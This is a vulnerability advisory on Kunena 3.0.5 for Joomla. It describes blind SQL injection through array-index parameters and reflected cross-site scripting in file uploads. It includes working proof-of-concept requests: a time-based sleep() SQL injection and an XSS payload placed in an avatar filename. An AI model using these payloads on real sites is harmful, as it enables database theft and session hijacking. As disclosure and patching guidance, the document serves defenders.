The Kunena forum extension for Joomla suffers from multiple SQL injection and cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. The vulnerabilities affect Kunena v3.0.5 and earlier.
The blind SQL injection vulnerability affects all pages/tasks that use parameters in the form of “parameter[]”. This is because the array index is not being validated. Attackers can use the vulnerability to read sensitive data stored in the Joomla database including the website’s admin users’ credentials. This can then be used to compromise the entire website.
Blind SQL injection relies on the ability to determine whether a condition is true or false, by causing a change in the behaviour of the affected application, for example the creation of different response times from the application, as shown in the following examples.
A true condition will cause a 10 second delay in the server’s response:
POST https://localhost/index.php?option=com_kunena&view=home&defaultmenu=130&Itemid=128
view=topics&0b4b16219de03f54bd92a580f9d4fa43=1&topics[2)+and+(if(1%3d1,sleep(10),1))%3d1%23]=1&task=unfavorite&kcheckgo=Go
Response time: ~ 11.5 seconds
A false condition will cause the server to respond without delay:
POST https://localhost/index.php?option=com_kunena&view=home&defaultmenu=130&Itemid=128
view=topics&0b4b16219de03f54bd92a580f9d4fa43=1&topics[2)+and+(if(1%3d2,sleep(10),1))%3d1%23]=1&task=unfavorite&kcheckgo=Go
Response time: ~ 1.5 seconds
The file upload and profile image upload functionality available on the forum extension are vulnerable to reflected cross-site scripting. Moreover, all of the pages that are vulnerable to the blind SQL injection are also vulnerable to reflected cross-site scripting due to the detailed error message returned by the server. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks such as drive-by downloads.
The following proof of concept example shows how an attacker can exploit the vulnerability on the profile image upload functionality in order to display an alert box:
POST https://localhost/index.php?option=com_kunena&view=home&defaultmenu=130&Itemid=12
—————————–34391417828549
Content-Disposition: form-data; name=”view”
user
—————————–34391417828549
Content-Disposition: form-data; name=”task”
Save
[…]
Content-Disposition: form-data; name=”avatarfile”; filename=”<iframe src=javascript:alert(‘XSS’)>“
[…]
Solution
The vendor has released a new version (3.0.6) to address the security vulnerabilities discovered by Dionach. The new version was released on the 28th of July 2014. Users are advised to update the Kunena forum extension for Joomla to the latest secure and stable version.
References
https://www.securityfocus.com/bid/68956/